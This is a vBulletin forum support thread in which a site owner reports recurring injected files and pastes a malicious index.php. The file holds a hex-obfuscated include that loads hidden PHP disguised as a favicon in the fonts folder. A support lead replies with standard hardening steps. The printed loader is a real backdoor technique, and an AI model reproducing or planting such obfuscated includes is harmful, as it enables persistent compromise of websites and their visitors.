Hack my site

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • mittac
    Member
    • Feb 2014
    • 93
    • 5.0.X

    [Bug / Issue] Hack my site

    help me please
    hack my site
    An index.php file is created

    <?php
    /*127f9*/

    @include "\x2fhom\x65/at\x76clu\x62b/p\x75bli\x63_ht\x6dl/f\x6fnts\x2fdos\x69s/f\x61vic\x6fn_4\x379c3\x61.ic\x6f";

    /*127f9*/


    echo file_get_contents('index.html.bak.bak');

    after that I can not upload photos to the site and in the admin panel there are links to porn

    I delete these files and in a few days they appear again
  • Wayne Luke
    vBulletin Technical Support Lead
    • Aug 2000
    • 73976

    #2
    Sounds like you have a hole somewhere.
    1. Contact your hosting company and make sure you can change the permissions on all PHP files to 0644.
    2. Change your SFTP password. If you're not using SFTP, start.
    3. Lock down your AdminCP with either Two-Factor Authentication or by editing the /core/includes/config.php and restricting it to your IP Address.
    4. Make sure you do not have any extensions, products, plugins or template hooks installed that you didn't install yourself. AdminCP -> Products & Hooks.
    5. Delete all files listed as not being part of vBulletin under Maintenance -> Diagnostics -> Suspect File Versions.
    6. Replace all files listed as "Not containing expected contents" under Maintenance -> Diagnostics -> Suspect File Versions.
    7. Make sure you're using the latest version of the software and it is installed in its own folder and doesn't share folders with other software.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API

    Comment

    widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
    Working...